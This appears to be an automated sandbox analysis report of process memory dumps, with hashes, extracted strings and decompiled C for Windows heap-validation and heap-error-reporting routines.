Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dae62d29b04a6131aa893eaf77b9549c5146c8e9996fcd8f51ffa1b7537113fe
Instruction ID: 79a78074261f817452fc2b2d55e91b6ff4c339d05952cca400f2f7541c4dde4b
Opcode Fuzzy Hash: dae62d29b04a6131aa893eaf77b9549c5146c8e9996fcd8f51ffa1b7537113fe
Instruction Fuzzy Hash: D0B09B719015C5D5FA11D7654608717795477D0755F56C055D1020681A4778C091F5F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02A0B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The instruction at %p referenced memory at %p., xrefs: 02A0B432
*** Inpage error in %ws:%s, xrefs: 02A0B418
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 02A0B2DC
Go determine why that thread has not released the critical section., xrefs: 02A0B3C5
This failed because of error %Ix., xrefs: 02A0B446
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 02A0B305
write to, xrefs: 02A0B4A6
*** enter .cxr %p for the context, xrefs: 02A0B50D
The resource is owned shared by %d threads, xrefs: 02A0B37E
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 02A0B476
read from, xrefs: 02A0B4AD, 02A0B4B2
a NULL pointer, xrefs: 02A0B4E0
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02A0B38F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 02A0B314
The critical section is owned by thread %p., xrefs: 02A0B3B9
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 02A0B39B
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 02A0B47D
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 02A0B323
*** then kb to get the faulting stack, xrefs: 02A0B51C
*** Resource timeout (%p) in %ws:%s, xrefs: 02A0B352
<unknown>, xrefs: 02A0B27E, 02A0B2D1, 02A0B350, 02A0B399, 02A0B417, 02A0B48E
The resource is owned exclusively by thread %p, xrefs: 02A0B374
*** enter .exr %p for the exception record, xrefs: 02A0B4F1
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 02A0B484
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 02A0B53F
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02A0B3D6
*** A stack buffer overrun occurred in %ws:%s, xrefs: 02A0B2F3
The instruction at %p tried to %s , xrefs: 02A0B4B6
an invalid address, %p, xrefs: 02A0B4CF
*** An Access Violation occurred in %ws:%s, xrefs: 02A0B48F

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 6c6cced0719e26d28b7e18efce3dbce8d567e5049369ff0f5ef9370c0ca8a510
Instruction ID: c8f393de8f5d30890e7b0c05b19f3ac381878434a028ab8a178018c8578c3034
Opcode Fuzzy Hash: 6c6cced0719e26d28b7e18efce3dbce8d567e5049369ff0f5ef9370c0ca8a510
Instruction Fuzzy Hash: 54813679A41200FFEB325B04ADC6E6B3B36EF9AB5DF410494F0061B192DB628511CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02A11C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E02A11C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x29348a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0295B150();
				} else {
					E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x2a4589c);
				E0295B150("Heap error detected at %p (heap handle %p)\n",  *0x2a458a0);
				_t27 =  *0x2a45898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M02A11E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0295B150();
				} else {
					E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0295B150("Error code: %d - %s\n",  *0x2a45898);
				_t113 =  *0x2a458a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0295B150();
					} else {
						E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0295B150("Parameter1: %p\n",  *0x2a458a4);
				}
				_t115 =  *0x2a458a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0295B150();
					} else {
						E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0295B150("Parameter2: %p\n",  *0x2a458a8);
				}
				_t117 =  *0x2a458ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0295B150();
					} else {
						E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0295B150("Parameter3: %p\n",  *0x2a458ac);
				}
				_t119 =  *0x2a458b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0295B150();
					} else {
						E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x2a458b4);
					E0295B150("Last known valid blocks: before - %p, after - %p\n",  *0x2a458b0);
				} else {
					_t120 =  *0x2a458b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0295B150();
				} else {
					E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0295B150("Stack trace available at %p\n", 0x2a458c0);
			}

0x02a11c10
0x02a11c16
0x02a11c1e
0x02a11c3d
0x02a11c3e
0x02a11c20
0x02a11c35
0x02a11c3a
0x02a11c44
0x02a11c55
0x02a11c5a
0x02a11c65
0x02a11c67
0x00000000
0x02a11c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x02a11c67
0x02a11cdc
0x02a11ce5
0x02a11d04
0x02a11d05
0x02a11ce7
0x02a11cfc
0x02a11d01
0x02a11d0b
0x02a11d17
0x02a11d1f
0x02a11d25
0x02a11d30
0x02a11d4f
0x02a11d50
0x02a11d32
0x02a11d47
0x02a11d4c
0x02a11d61
0x02a11d67
0x02a11d68
0x02a11d6e
0x02a11d79
0x02a11d98
0x02a11d99
0x02a11d7b
0x02a11d90
0x02a11d95
0x02a11daa
0x02a11db0
0x02a11db1
0x02a11db7
0x02a11dc2
0x02a11de1
0x02a11de2
0x02a11dc4
0x02a11dd9
0x02a11dde
0x02a11df3
0x02a11df9
0x02a11dfa
0x02a11e00
0x02a11e0a
0x02a11e13
0x02a11e32
0x02a11e33
0x02a11e15
0x02a11e2a
0x02a11e2f
0x02a11e39
0x02a11e4a
0x02a11e02
0x02a11e02
0x02a11e08
0x00000000
0x00000000
0x02a11e08
0x02a11e5b
0x02a11e7a
0x02a11e7b
0x02a11e5d
0x02a11e72
0x02a11e77
0x02a11e95

Strings

heap_failure_invalid_argument, xrefs: 02A11CAD
HEAP: , xrefs: 02A11C16, 02A11C3D, 02A11D04, 02A11D4F, 02A11D98, 02A11DE1, 02A11E32, 02A11E7A
heap_failure_entry_corruption, xrefs: 02A11C83
heap_failure_invalid_allocation_type, xrefs: 02A11CB4
heap_failure_multiple_entries_corruption, xrefs: 02A11C8A
Error code: %d - %s, xrefs: 02A11D12
Parameter1: %p, xrefs: 02A11D5C
Parameter3: %p, xrefs: 02A11DEE
heap_failure_virtual_block_corruption, xrefs: 02A11C91
Heap error detected at %p (heap handle %p), xrefs: 02A11C50
heap_failure_listentry_corruption, xrefs: 02A11CD0
heap_failure_block_not_busy, xrefs: 02A11CA6
Parameter2: %p, xrefs: 02A11DA5
heap_failure_generic, xrefs: 02A11C7C
heap_failure_internal, xrefs: 02A11C6E
heap_failure_buffer_overrun, xrefs: 02A11C98
Stack trace available at %p, xrefs: 02A11E86
heap_failure_unknown, xrefs: 02A11C75
HEAP[%wZ]: , xrefs: 02A11C30, 02A11CF7, 02A11D42, 02A11D8B, 02A11DD4, 02A11E25, 02A11E6D
Last known valid blocks: before - %p, after - %p, xrefs: 02A11E45
heap_failure_lfh_bitmap_mismatch, xrefs: 02A11CD7
heap_failure_buffer_underrun, xrefs: 02A11C9F
heap_failure_usage_after_free, xrefs: 02A11CBB
heap_failure_cross_heap_operation, xrefs: 02A11CC2
heap_failure_freelists_corruption, xrefs: 02A11CC9

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: e80fd3eaede8539780b8619177342ab84cd05890375a425fe0dd7d9f5006c0dc
Instruction ID: bc9d6bc9c5dcbbf9233371f1db853060da00098e49a8964dc509ef0419a5cf0c
Opcode Fuzzy Hash: e80fd3eaede8539780b8619177342ab84cd05890375a425fe0dd7d9f5006c0dc
Instruction Fuzzy Hash: D9613236A10254DFEA01DB98D894E3173F5FB94B34B09842AFA0E5B381DE60CC91DF0A

Uniqueness

Uniqueness Score: -1.00%

Function 02A14AEF, Relevance: 13.0, Strings: 10, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E02A14AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E0295B150();
						} else {
							E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E0295B150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0295B150();
					} else {
						E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E02A0FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E0295B150();
						} else {
							E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E0295B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E0295B150();
								} else {
									E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E0295B150();
									} else {
										E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E0295B150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E02A0FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E0295B150();
										} else {
											E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E029AD540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E0295B150();
								} else {
									E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E02A1A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E0297E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E02A1A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E0297E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E0297A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E0297A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E0297BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E02A023E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E02951F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}

0x02a14af7
0x02a14afb
0x02a14afd
0x02a14b01
0x02a14b03
0x02a14b08
0x02a14b0a
0x02a14b0f
0x02a14eb5
0x02a14eb5
0x02a14ebb
0x02a150d5
0x02a150d8
0x02a14ff6
0x00000000
0x02a14ff6
0x02a150de
0x02a150e4
0x02a150e8
0x02a15107
0x02a1510c
0x02a150ea
0x02a150ff
0x02a15104
0x02a15112
0x02a15115
0x02a15118
0x02a15119
0x02a150cb
0x02a150cb
0x02a150af
0x00000000
0x02a150af
0x02a14ecb
0x02a150b6
0x02a150bb
0x02a14ed1
0x02a14ee6
0x02a14eeb
0x02a150c1
0x02a150c2
0x02a150c5
0x02a150c6
0x00000000
0x00000000
0x00000000
0x00000000
0x02a14b15
0x02a14b15
0x02a14b1c
0x02a14b1e
0x02a14b23
0x02a14b27
0x02a14b33
0x02a14b38
0x02a14b3a
